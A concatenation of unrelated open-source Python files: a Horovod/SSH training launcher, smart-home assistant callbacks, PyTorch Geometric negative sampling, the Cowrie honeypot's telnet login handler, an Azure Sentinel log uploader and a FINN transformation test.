<reponame>thehardikv/ai-platform-samples import collections import datetime import json import multiprocessing import os import subprocess import sys import time _SSHD_BINARY_PATH = "/usr/sbin/sshd" EnvironmentConfig = collections.namedtuple( "EnvironmentConfig", ["hosts", "port", "is_chief", "pools", "job_id"]) class DeadlineExceededError(Exception): """Indicates an action took too long.""" pass def _sub_process_num_gpus(unused): del unused # This is imported here so that we don't load tensorflow in the parent # process. Once the sub-process exits, it releases its allocated GPU memory. from tensorflow.python.client import device_lib local_device_protos = device_lib.list_local_devices() gpus = [x.name for x in local_device_protos if x.device_type == "GPU"] return len(gpus) def _get_available_gpus(): """Returns the number of GPUs on the machine.""" pool = multiprocessing.Pool(1) result = pool.map(_sub_process_num_gpus, [None])[0] pool.close() pool.join() return result def parse_environment_config(env_config_str, job_id): """Parses environment config and returns a list of hosts as well as the role. Returns: An EnvironmentConfig. """ if env_config_str: ssh_port = -1 env_config_json = json.loads(env_config_str) cluster = env_config_json.get("cluster") if not cluster: return None, True hosts = [] pools = collections.defaultdict(list) for pool_type, tasks_per_type in cluster.items(): if pool_type == "master": pool_type = "chief" for host_and_port in tasks_per_type: host, port = host_and_port.split(":") if host == "127.0.0.1": host = "localhost" port = int(port) if ssh_port == -1: ssh_port = port elif ssh_port != port: raise ValueError("Inconsistent ssh ports across tasks %d != %d." % (ssh_port, port)) hosts.append(host) pools[pool_type].append(host) is_chief = False has_chief = "chief" in pools if (env_config_json["task"]["type"] == "master" or env_config_json["task"]["type"] == "chief"): is_chief = True if int(env_config_json["task"]["index"]) != 0: raise ValueError("Only one master node is expected.") elif ((not has_chief) and (env_config_json["task"]["type"] == "worker") and int(env_config_json["task"]["index"]) == 0): is_chief = True pools["chief"].append(pools["worker"].pop(0)) elif env_config_json["task"]["type"] != "worker": raise ValueError("Unexpected task type for Horovod training: %s." % env_config_json["task"]["type"]) return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief, pools=pools, job_id=job_id) else: return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True, pools={"chief": ["localhost"]}, job_id=job_id) def start_ssh_server(port, is_chief): ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)] if not is_chief: ssh_server_command.append("-D") completed = subprocess.call(ssh_server_command) if completed != 0: raise OSError("SSH server did not start successfully.") def wait_for_ssh_servers(hosts, port, timeout_seconds): deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta( seconds=timeout_seconds) unavailable_hosts = [] while datetime.datetime.utcnow() < deadline_datetime: unavailable_hosts = [] for host in hosts: ssh_command = ["ssh", "-q", host, "-p", str(port), "true"] result = subprocess.call(ssh_command) if result != 0: unavailable_hosts.append(host) if not unavailable_hosts: return # Retry in 1 second. time.sleep(1) raise DeadlineExceededError( "Timed out while waiting for all hosts to start. " "Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" % (unavailable_hosts, timeout_seconds)) def run_horovod(env_config, jobs_per_host, args): env = dict(os.environ) del env["TF_CONFIG"] num_jobs = len(env_config.hosts) * jobs_per_host hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts) horovod_command = [ "horovodrun", "--ssh-port", str(env_config.port), "-H", hosts, "--num-proc", str(num_jobs) ] horovod_command.extend(args) exit_code = subprocess.call(horovod_command, env=env) return exit_code def benchmark_network(env_config): if not env_config.pools["worker"]: raise ValueError("No workers in the pool to do network benchmarking.") iperf_server = ["iperf", "-s", "-p", "6000"] server = subprocess.Popen(iperf_server) # Wait 10 seconds for the local server to start. time.sleep(10) iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p", str(env_config.port), "iperf", "-p", "6000", "-c", env_config.pools["chief"][0]] subprocess.call(iperf_command) server.kill() def copy_files_recursively(src, dest): if not dest.startswith("gs://"): try: os.makedirs(dest) except OSError: pass copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest] exit_code = subprocess.call(copy_cmd) if exit_code != 0: raise RuntimeError("Error while copying %s to %s" % (src, dest)) return exit_code def main(): env_config_str = os.environ.get("TF_CONFIG") job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun") env_config = parse_environment_config(env_config_str, job_id) print (env_config, env_config.pools, env_config.hosts, os.environ) if os.environ.get("STAGE_GCS_PATH", False): copy_files_recursively( os.environ.get("STAGE_GCS_PATH"), os.environ.get("STAGING_DIR", "/input")) start_ssh_server(env_config.port, env_config.is_chief) max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1) if env_config.is_chief: exit_code = 0 for retry in range(max_num_retries): staging_timeout_seconds = int( os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600)) wait_for_ssh_servers(env_config.hosts, env_config.port, staging_timeout_seconds) if os.environ.get("BENCHMARK_NETWORK", False): benchmark_network(env_config) num_gpus = _get_available_gpus() # If there are no GPUs, we can just run single process per machine. jobs_per_host = max(1, num_gpus) args = sys.argv[1:] exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host, args=args) if exit_code == 0: break else: print ("Retrying...", retry, "out of", max_num_retries) if os.environ.get("GCS_OUTPUT_PATH", False): copy_files_recursively( os.environ.get("OUTPUT_DIR", "/output"), os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id)) sys.exit(exit_code) if __name__ == "__main__": main()
usr/callbacks/action/tools.py
uwitec/LEHome
151
9206
#!/usr/bin/env python # encoding: utf-8 from __future__ import division from decimal import Decimal import subprocess import threading import urllib2 import urllib import httplib import json import re import hashlib import base64 # import zlib from lib.command.runtime import UserInput from lib.helper.CameraHelper import CameraHelper from lib.sound import Sound from util import Util from util.Res import Res from util.log import * from lib.model import Callback class timer_callback(Callback.Callback): def callback(self, cmd, action, target, msg): if msg is None: self._home.publish_msg(cmd, u"时间格式错误") return False, None if msg.endswith(u'点') or \ msg.endswith(u'分'): t = Util.gap_for_timestring(msg) elif msg.endswith(u"秒"): t = int(Util.cn2dig(msg[:-1])) elif msg.endswith(u"分钟"): t = int(Util.cn2dig(msg[:-2]))*60 elif msg.endswith(u"小时"): t = int(Util.cn2dig(msg[:-2]))*60*60 else: self._home.publish_msg(cmd, u"时间格式错误") return False if t is None: self._home.publish_msg(cmd, u"时间格式错误") return False, None DEBUG("thread wait for %d sec" % (t, )) self._home.publish_msg(cmd, action + target + msg) threading.current_thread().waitUtil(t) if threading.current_thread().stopped(): return False self._home.setResume(True) count = 7 Sound.notice( Res.get_res_path("sound/com_bell"), True, count) self._home.setResume(False) return True class translate_callback(Callback.Callback): base_url = "http://fanyi.youdao.com/openapi.do" def callback(self, cmd, msg): if Util.empty_str(msg): cancel_flag = u"取消" finish_flag = u"完成" self._home.publish_msg( cmd , u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag) , cmd_type="input" ) msg = UserInput(self._home).waitForInput( finish=finish_flag, cancel=cancel_flag) if msg is None: self._home.publish_msg(cmd, u"无翻译内容") elif len(msg) > 200: self._home.publish_msg(cmd, u"翻译内容过长(<200字)") else: try: values = { "keyfrom":"11111testt111", "key":"2125866912", "type":"data", "doctype":"json", "version":"1.1", "q":msg.encode("utf-8") } url = translate_callback.base_url + "?" + urllib.urlencode(values) res = urllib2.urlopen(url).read() res = " ".join(json.loads(res)["translation"]) self._home.publish_msg(cmd, u"翻译结果:\n" + res) except Exception, ex: ERROR("request error:", ex) self._home.publish_msg(cmd, u"翻译失败") return True return True class baidu_wiki_callback(Callback.Callback): base_url = "http://wapbaike.baidu.com" def searchWiki(self, word, time=10): value = {"word": word.encode("utf-8")} url = baidu_wiki_callback.base_url + \ "/search?" + urllib.urlencode(value) try: response = urllib2.urlopen(url, timeout=time) html = response.read().encode("utf-8") response.close() real_url = None content = None m = re.compile(r"URL=(.+)'>").search(html) if m: real_url = m.group(1) else: return None, None real_url = real_url[:real_url.index("?")] if not real_url is None: url = baidu_wiki_callback.base_url + real_url response = urllib2.urlopen(url, timeout=time) html = response.read() response.close() m = re.compile( r'<p class="summary"><p>(.+)<div class="card-info">', re.DOTALL ).search(html) if m: content = m.group(1) return Util.strip_tags(content), url else: return None, None except Exception, ex: ERROR("wiki error: ", ex) return None, None def callback(self, cmd, msg): if Util.empty_str(msg): cancel_flag = u"取消" finish_flag = u"完成" self._home.publish_msg( cmd , u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag) , cmd_type="input" ) msg = UserInput(self._home).waitForInput( finish=finish_flag, cancel=cancel_flag) if not msg is None: self._home.publish_msg(cmd, u"正在搜索...") res, url = self.searchWiki(msg) if res is None: self._home.publish_msg(cmd, u"无百科内容") else: res = res.decode("utf-8") if len(res) > 140: res = res[:140] msg = u"百度百科:\n %s...\n%s" \ % (res, url) self._home.publish_msg(cmd, msg) else: self._home.publish_msg(cmd, u"无百科内容") return True class cal_callback(Callback.Callback): _ops = { u'加':'+', u'减':'-', u'乘':'*', u'除':'/', u'+':'+', u'-':'-', u'*':'*', u'/':'/', u'(':'(', u'(':'(', u')':')', u')':')', } def _parse_tokens(self, src): tokens = [] cur_t = u'' for term in src: if term in cal_callback._ops: if cur_t != u'': tokens.append(cur_t) cur_t = u'' tokens.append(term) else: cur_t += term if cur_t != u'': tokens.append(cur_t) return tokens def _parse_expression(self, tokens): expression = u'' for token in tokens: if token in cal_callback._ops: expression += cal_callback._ops[token] else: num = Util.cn2dig(token) if num is None: return None expression += str(num) res = None INFO("expression: " + expression) try: res = eval(expression) res = Decimal.from_float(res).quantize(Decimal('0.00')) except Exception, ex: ERROR("cal expression error:", ex) return res def callback(self, cmd, msg): if Util.empty_str(msg): cancel_flag = u"取消" finish_flag = u"完成" self._home.publish_msg( cmd , u"请输入公式, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag) , cmd_type="input" ) msg = UserInput(self._home).waitForInput( finish=finish_flag, cancel=cancel_flag) if msg is None: self._home.publish_msg(cmd, u"无公式内容") else: tokens = self._parse_tokens(msg) if not tokens is None: res = self._parse_expression(tokens) if not res is None: self._home.publish_msg(cmd, u"%s = %s" % (msg, str(res))) return True, res else: self._home.publish_msg(cmd, u"计算出错") return True, None else: self._home.publish_msg(cmd, u"格式有误") return True, None class camera_quickshot_callback(Callback.Callback): IMAGE_SERVER_URL = "http://lehome.sinaapp.com/image" IMAGE_HOST_URL = "http://lehome-image.stor.sinaapp.com/" def _upload_image(self, img_src, thumbnail_src): if img_src is None or len(img_src) == 0: return None, None INFO("uploading: %s %s" % (img_src, thumbnail_src)) # swift --insecure upload image data/capture/2015_05_23_001856.jpg proc = subprocess.Popen( [ "swift", "--insecure", "upload", "image", thumbnail_src, img_src ], stdout=subprocess.PIPE ) read_img = None read_thumbnail = None for i in range(2) : try: data = proc.stdout.readline().strip() #block / wait INFO("swift readline: %s" % data) if data.endswith(".thumbnail.jpg"): INFO("save to storage:%s" % data) read_thumbnail = camera_quickshot_callback.IMAGE_HOST_URL + data elif data.endswith(".jpg"): INFO("save to storage:%s" % data) read_img = camera_quickshot_callback.IMAGE_HOST_URL + data if not read_img is None and not read_thumbnail is None: return read_img, read_thumbnail except (KeyboardInterrupt, SystemExit): raise except Exception, ex: ERROR(ex) break return None, None def callback(self, cmd, msg): self._home.publish_msg(cmd, u"正在截图...") Sound.notice(Res.get_res_path("sound/com_shoot")) save_path="data/capture/" save_name, thumbnail_name = CameraHelper().take_a_photo(save_path) # for test # save_name = "2015_05_02_164052.jpg" if save_name is None: self._home.publish_msg(cmd, u"截图失败") INFO("capture faild.") return True img_url, thumbnail_url = self._upload_image( save_path + save_name, save_path + thumbnail_name, ) if img_url is None: self._home.publish_msg(cmd, u"截图失败") INFO("upload capture faild.") return True else: self._home.publish_msg( cmd, msg=img_url, cmd_type="capture" ) return True class push_info_callback(Callback.Callback): def callback(self, cmd, target, msg): if target is None or len(target) == 0: if msg is None or len(msg) == 0: self._home.publish_msg(cmd, u"请输入内容") return True, None self._home.publish_msg(cmd, msg) DEBUG("show_callback: %s" % msg) return True, msg return True, "push"
torch_geometric/utils/negative_sampling.py
NucciTheBoss/pytorch_geometric
2,350
9212
import random from typing import Optional, Tuple, Union import numpy as np import torch from torch import Tensor from torch_geometric.utils import coalesce, degree, remove_self_loops from .num_nodes import maybe_num_nodes def negative_sampling(edge_index: Tensor, num_nodes: Optional[Union[int, Tuple[int, int]]] = None, num_neg_samples: Optional[int] = None, method: str = "sparse", force_undirected: bool = False) -> Tensor: r"""Samples random negative edges of a graph given by :attr:`edge_index`. Args: edge_index (LongTensor): The edge indices. num_nodes (int or Tuple[int, int], optional): The number of nodes, *i.e.* :obj:`max_val + 1` of :attr:`edge_index`. If given as a tuple, then :obj:`edge_index` is interpreted as a bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`. (default: :obj:`None`) num_neg_samples (int, optional): The (approximate) number of negative samples to return. If set to :obj:`None`, will try to return a negative edge for every positive edge. (default: :obj:`None`) method (string, optional): The method to use for negative sampling, *i.e.*, :obj:`"sparse"` or :obj:`"dense"`. This is a memory/runtime trade-off. :obj:`"sparse"` will work on any graph of any size, while :obj:`"dense"` can perform faster true-negative checks. (default: :obj:`"sparse"`) force_undirected (bool, optional): If set to :obj:`True`, sampled negative edges will be undirected. (default: :obj:`False`) :rtype: LongTensor """ assert method in ['sparse', 'dense'] size = num_nodes bipartite = isinstance(size, (tuple, list)) size = maybe_num_nodes(edge_index) if size is None else size size = (size, size) if not bipartite else size force_undirected = False if bipartite else force_undirected idx, population = edge_index_to_vector(edge_index, size, bipartite, force_undirected) if idx.numel() >= population: return edge_index.new_empty((2, 0)) if num_neg_samples is None: num_neg_samples = edge_index.size(1) if force_undirected: num_neg_samples = num_neg_samples // 2 prob = 1. - idx.numel() / population # Probability to sample a negative. sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size. neg_idx = None if method == 'dense': # The dense version creates a mask of shape `population` to check for # invalid samples. mask = idx.new_ones(population, dtype=torch.bool) mask[idx] = False for _ in range(3): # Number of tries to sample negative indices. rnd = sample(population, sample_size, idx.device) rnd = rnd[mask[rnd]] # Filter true negatives. neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd]) if neg_idx.numel() >= num_neg_samples: neg_idx = neg_idx[:num_neg_samples] break mask[neg_idx] = False else: # 'sparse' # The sparse version checks for invalid samples via `np.isin`. idx = idx.to('cpu') for _ in range(3): # Number of tries to sample negative indices. rnd = sample(population, sample_size, device='cpu') mask = np.isin(rnd, idx) if neg_idx is not None: mask |= np.isin(rnd, neg_idx.to('cpu')) mask = torch.from_numpy(mask).to(torch.bool) rnd = rnd[~mask].to(edge_index.device) neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd]) if neg_idx.numel() >= num_neg_samples: neg_idx = neg_idx[:num_neg_samples] break return vector_to_edge_index(neg_idx, size, bipartite, force_undirected) def batched_negative_sampling( edge_index: Tensor, batch: Union[Tensor, Tuple[Tensor, Tensor]], num_neg_samples: Optional[int] = None, method: str = "sparse", force_undirected: bool = False, ) -> Tensor: r"""Samples random negative edges of multiple graphs given by :attr:`edge_index` and :attr:`batch`. Args: edge_index (LongTensor): The edge indices. batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector :math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each node to a specific example. If given as a tuple, then :obj:`edge_index` is interpreted as a bipartite graph connecting two different node types. num_neg_samples (int, optional): The number of negative samples to return. If set to :obj:`None`, will try to return a negative edge for every positive edge. (default: :obj:`None`) method (string, optional): The method to use for negative sampling, *i.e.*, :obj:`"sparse"` or :obj:`"dense"`. This is a memory/runtime trade-off. :obj:`"sparse"` will work on any graph of any size, while :obj:`"dense"` can perform faster true-negative checks. (default: :obj:`"sparse"`) force_undirected (bool, optional): If set to :obj:`True`, sampled negative edges will be undirected. (default: :obj:`False`) :rtype: LongTensor """ if isinstance(batch, Tensor): src_batch, dst_batch = batch, batch else: src_batch, dst_batch = batch[0], batch[1] split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist() edge_indices = torch.split(edge_index, split, dim=1) num_src = degree(src_batch, dtype=torch.long) cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]]) if isinstance(batch, Tensor): num_nodes = num_src.tolist() cumsum = cum_src else: num_dst = degree(dst_batch, dtype=torch.long) cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]]) num_nodes = torch.stack([num_src, num_dst], dim=1).tolist() cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1) neg_edge_indices = [] for i, edge_index in enumerate(edge_indices): edge_index = edge_index - cumsum[i] neg_edge_index = negative_sampling(edge_index, num_nodes[i], num_neg_samples, method, force_undirected) neg_edge_index += cumsum[i] neg_edge_indices.append(neg_edge_index) return torch.cat(neg_edge_indices, dim=1) def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None, contains_neg_self_loops: bool = True): r"""Samples a negative edge :obj:`(i,k)` for every positive edge :obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a tuple of the form :obj:`(i,j,k)`. Args: edge_index (LongTensor): The edge indices. num_nodes (int, optional): The number of nodes, *i.e.* :obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`) contains_neg_self_loops (bool, optional): If set to :obj:`False`, sampled negative edges will not contain self loops. (default: :obj:`True`) :rtype: (LongTensor, LongTensor, LongTensor) """ num_nodes = maybe_num_nodes(edge_index, num_nodes) row, col = edge_index.cpu() pos_idx = row * num_nodes + col if not contains_neg_self_loops: loop_idx = torch.arange(num_nodes) * (num_nodes + 1) pos_idx = torch.cat([pos_idx, loop_idx], dim=0) rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long) neg_idx = row * num_nodes + rand mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool) rest = mask.nonzero(as_tuple=False).view(-1) while rest.numel() > 0: # pragma: no cover tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long) rand[rest] = tmp neg_idx = row[rest] * num_nodes + tmp mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool) rest = rest[mask] return edge_index[0], edge_index[1], rand.to(edge_index.device) def structured_negative_sampling_feasible( edge_index: Tensor, num_nodes: Optional[int] = None, contains_neg_self_loops: bool = True) -> bool: r"""Returns :obj:`True` if :meth:`~torch_geometric.utils.structured_negative_sampling` is feasible on the graph given by :obj:`edge_index`. :obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible if atleast one node is connected to all other nodes. Args: edge_index (LongTensor): The edge indices. num_nodes (int, optional): The number of nodes, *i.e.* :obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`) contains_neg_self_loops (bool, optional): If set to :obj:`False`, sampled negative edges will not contain self loops. (default: :obj:`True`) :rtype: bool """ num_nodes = maybe_num_nodes(edge_index, num_nodes) max_num_neighbors = num_nodes edge_index = coalesce(edge_index, num_nodes=num_nodes) if not contains_neg_self_loops: edge_index, _ = remove_self_loops(edge_index) max_num_neighbors -= 1 # Reduce number of valid neighbors deg = degree(edge_index[0], num_nodes) # True if there exists no node that is connected to all other nodes. return bool(torch.all(deg < max_num_neighbors)) ############################################################################### def sample(population: int, k: int, device=None) -> Tensor: if population <= k: return torch.arange(population, device=device) else: return torch.tensor(random.sample(range(population), k), device=device) def edge_index_to_vector( edge_index: Tensor, size: Tuple[int, int], bipartite: bool, force_undirected: bool = False, ) -> Tuple[Tensor, int]: row, col = edge_index if bipartite: # No need to account for self-loops. idx = (row * size[1]).add_(col) population = size[0] * size[1] return idx, population elif force_undirected: assert size[0] == size[1] num_nodes = size[0] # We only operate on the upper triangular matrix: mask = row < col row, col = row[mask], col[mask] offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row] idx = row.mul_(num_nodes).add_(col).sub_(offset) population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes return idx, population else: assert size[0] == size[1] num_nodes = size[0] # We remove self-loops as we do not want to take them into account # when sampling negative values. mask = row != col row, col = row[mask], col[mask] col[row < col] -= 1 idx = row.mul_(num_nodes - 1).add_(col) population = num_nodes * num_nodes - num_nodes return idx, population def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool, force_undirected: bool = False) -> Tensor: if bipartite: # No need to account for self-loops. row = idx.div(size[1], rounding_mode='floor') col = idx % size[1] return torch.stack([row, col], dim=0) elif force_undirected: assert size[0] == size[1] num_nodes = size[0] offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0) end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes, device=idx.device) row = torch.bucketize(idx, end.sub_(offset), right=True) col = offset[row].add_(idx) % num_nodes return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0) else: assert size[0] == size[1] num_nodes = size[0] row = idx.div(num_nodes - 1, rounding_mode='floor') col = idx % (num_nodes - 1) col[row <= col] += 1 return torch.stack([row, col], dim=0)
src/cowrie/telnet/userauth.py
uwacyber/cowrie
2,316
9214
<gh_stars>1000+ # Copyright (C) 2015, 2016 GoSecure Inc. """ Telnet Transport and Authentication for the Honeypot @author: <NAME> <<EMAIL>> """ from __future__ import annotations import struct from twisted.conch.telnet import ( ECHO, LINEMODE, NAWS, SGA, AuthenticatingTelnetProtocol, ITelnetProtocol, ) from twisted.python import log from cowrie.core.config import CowrieConfig from cowrie.core.credentials import UsernamePasswordIP class HoneyPotTelnetAuthProtocol(AuthenticatingTelnetProtocol): """ TelnetAuthProtocol that takes care of Authentication. Once authenticated this protocol is replaced with HoneyPotTelnetSession. """ loginPrompt = b"login: " passwordPrompt = b"Password: " windowSize = [40, 80] def connectionMade(self): # self.transport.negotiationMap[NAWS] = self.telnet_NAWS # Initial option negotation. Want something at least for Mirai # for opt in (NAWS,): # self.transport.doChain(opt).addErrback(log.err) # I need to doubly escape here since my underlying # CowrieTelnetTransport hack would remove it and leave just \n self.transport.write(self.factory.banner.replace(b"\n", b"\r\r\n")) self.transport.write(self.loginPrompt) def connectionLost(self, reason): """ Fires on pre-authentication disconnects """ AuthenticatingTelnetProtocol.connectionLost(self, reason) def telnet_User(self, line): """ Overridden to conditionally kill 'WILL ECHO' which confuses clients that don't implement a proper Telnet protocol (most malware) """ self.username = line # .decode() # only send ECHO option if we are chatting with a real Telnet client self.transport.willChain(ECHO) # FIXME: this should be configurable or provided via filesystem self.transport.write(self.passwordPrompt) return "Password" def telnet_Password(self, line): username, password = self.username, line # .decode() del self.username def login(ignored): self.src_ip = self.transport.getPeer().host creds = UsernamePasswordIP(username, password, self.src_ip) d = self.portal.login(creds, self.src_ip, ITelnetProtocol) d.addCallback(self._cbLogin) d.addErrback(self._ebLogin) # are we dealing with a real Telnet client? if self.transport.options: # stop ECHO # even if ECHO negotiation fails we still want to attempt a login # this allows us to support dumb clients which is common in malware # thus the addBoth: on success and on exception (AlreadyNegotiating) self.transport.wontChain(ECHO).addBoth(login) else: # process login login("") return "Discard" def telnet_Command(self, command): self.transport.protocol.dataReceived(command + b"\r") return "Command" def _cbLogin(self, ial): """ Fired on a successful login """ interface, protocol, logout = ial protocol.windowSize = self.windowSize self.protocol = protocol self.logout = logout self.state = "Command" self.transport.write(b"\n") # Remove the short timeout of the login prompt. self.transport.setTimeout( CowrieConfig.getint("honeypot", "interactive_timeout", fallback=300) ) # replace myself with avatar protocol protocol.makeConnection(self.transport) self.transport.protocol = protocol def _ebLogin(self, failure): # TODO: provide a way to have user configurable strings for wrong password self.transport.wontChain(ECHO) self.transport.write(b"\nLogin incorrect\n") self.transport.write(self.loginPrompt) self.state = "User" def telnet_NAWS(self, data): """ From TelnetBootstrapProtocol in twisted/conch/telnet.py """ if len(data) == 4: width, height = struct.unpack("!HH", b"".join(data)) self.windowSize = [height, width] else: log.msg("Wrong number of NAWS bytes") def enableLocal(self, opt): if opt == ECHO: return True # TODO: check if twisted now supports SGA (see git commit c58056b0) elif opt == SGA: return False else: return False def enableRemote(self, opt): # TODO: check if twisted now supports LINEMODE (see git commit c58056b0) if opt == LINEMODE: return False elif opt == NAWS: return True elif opt == SGA: return True else: return False
authcheck/app/model/exception.py
flyr4nk/secscan-authcheck
572
9215
class WebException(Exception): pass class ParserException(Exception): """ 解析异常 """ pass class ApiException(Exception): """ api异常 """ pass class WsException(Exception): """ 轮询异常 """ pass class SsoException(Exception): """ sso异常 """ pass class LibException(Exception): """ lib异常 """ pass class AccountException(Exception): """ 账号异常(账号失效) """ pass class FlowException(Exception): """ 认证流量异常 """ pass
Solutions/TenableIO/Data Connectors/azure_sentinel.py
johnbilliris/Azure-Sentinel
2,227
9218
<reponame>johnbilliris/Azure-Sentinel import re import base64 import hmac import hashlib import logging import requests from datetime import datetime class AzureSentinel: def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''): self._workspace_id = workspace_id self._workspace_key = workspace_key self._log_type = log_type if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())): log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com' pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$" if not re.match(pattern, str(log_analytics_url)): raise Exception("Invalid Log Analytics Uri.") self._log_analytics_url = log_analytics_url def build_signature(self, date, content_length, method, content_type, resource): x_headers = 'x-ms-date:' + date string_to_hash = method + "\n" + \ str(content_length) + "\n" + content_type + \ "\n" + x_headers + "\n" + resource bytes_to_hash = bytes(string_to_hash, encoding="utf-8") decoded_key = base64.b64decode(self._workspace_key) encoded_hash = base64.b64encode(hmac.new( decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode() authorization = "SharedKey {}:{}".format( self._workspace_id, encoded_hash) return authorization def post_data(self, body): logging.info('constructing post to send to Azure Sentinel.') method = 'POST' content_type = 'application/json' resource = '/api/logs' rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT') content_length = len(body) logging.info('build signature.') signature = self.build_signature( rfc1123date, content_length, method, content_type, resource) logging.info('signature built.') uri = self._log_analytics_url + resource + '?api-version=2016-04-01' headers = { 'content-type': content_type, 'Authorization': signature, 'Log-Type': self._log_type, 'x-ms-date': rfc1123date } logging.info('sending post to Azure Sentinel.') response = requests.post(uri, data=body, headers=headers) logging.info(response.status_code) if (response.status_code >= 200 and response.status_code <= 299): return response.status_code else: logging.warn("Events are not processed into Azure. Response code: {}".format( response.status_code)) raise Exception( f'Sending to Azure Sentinel failed with status code {response.status_code}')
tests/transformation/streamline/test_move_identical_op_past_join_op.py
mmrahorovic/finn
109
9223
import pytest from onnx import TensorProto from onnx import helper as oh import finn.core.onnx_exec as oxe from finn.core.modelwrapper import ModelWrapper from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd from finn.util.basic import gen_finn_dt_tensor def create_model(perm): if perm == [0, 3, 1, 2]: in_shape = [1, 128, 1, 256] out_shape = [1, 256, 128, 1] if perm == [0, 2, 3, 1]: in_shape = [1, 256, 128, 1] out_shape = [1, 128, 1, 256] Transpose1_node = oh.make_node( "Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm ) Transpose2_node = oh.make_node( "Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm ) Join1_node = oh.make_node( "Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"] ) in_transpose1 = oh.make_tensor_value_info( "in_transpose1", TensorProto.FLOAT, in_shape ) in_transpose2 = oh.make_tensor_value_info( "in_transpose2", TensorProto.FLOAT, in_shape ) out_transpose1 = oh.make_tensor_value_info( "out_transpose1", TensorProto.FLOAT, out_shape ) out_transpose2 = oh.make_tensor_value_info( "out_transpose2", TensorProto.FLOAT, out_shape ) out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape) graph = oh.make_graph( nodes=[Transpose1_node, Transpose2_node, Join1_node], name="test_graph", inputs=[in_transpose1, in_transpose2], outputs=[out_join1], value_info=[ out_transpose1, out_transpose2, ], ) onnx_model = oh.make_model(graph, producer_name="test_model") model = ModelWrapper(onnx_model) return model # Permutation of transpose node @pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]]) def test_move_identical_op_past_join_op(perm): model = create_model(perm) # Create input data input0_tensor_name = model.graph.input[0].name input1_tensor_name = model.graph.input[1].name # Note: it is assumed that both tensors have the same shape and data type input_shape = model.get_tensor_shape(input0_tensor_name) input_dtype = model.get_tensor_datatype(input0_tensor_name) input_val = gen_finn_dt_tensor(input_dtype, input_shape) input_dict = {} input_dict[input0_tensor_name] = input_val input_dict[input1_tensor_name] = input_val model_transformed = model.transform(MoveTransposePastJoinAdd()) assert oxe.compare_execution(model, model_transformed, input_dict) # Check if order changed node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type node0_input0_model_transformed = model_transformed.find_consumers( model_transformed.graph.input[0].name )[0].op_type node1_input1_model_transformed = model_transformed.find_consumers( model_transformed.graph.input[1].name )[0].op_type assert node0_input0_model != node0_input0_model_transformed assert node1_input1_model != node1_input1_model_transformed
part19/test_interpreter.py
fazillatheef/lsbasi
1,682
9241
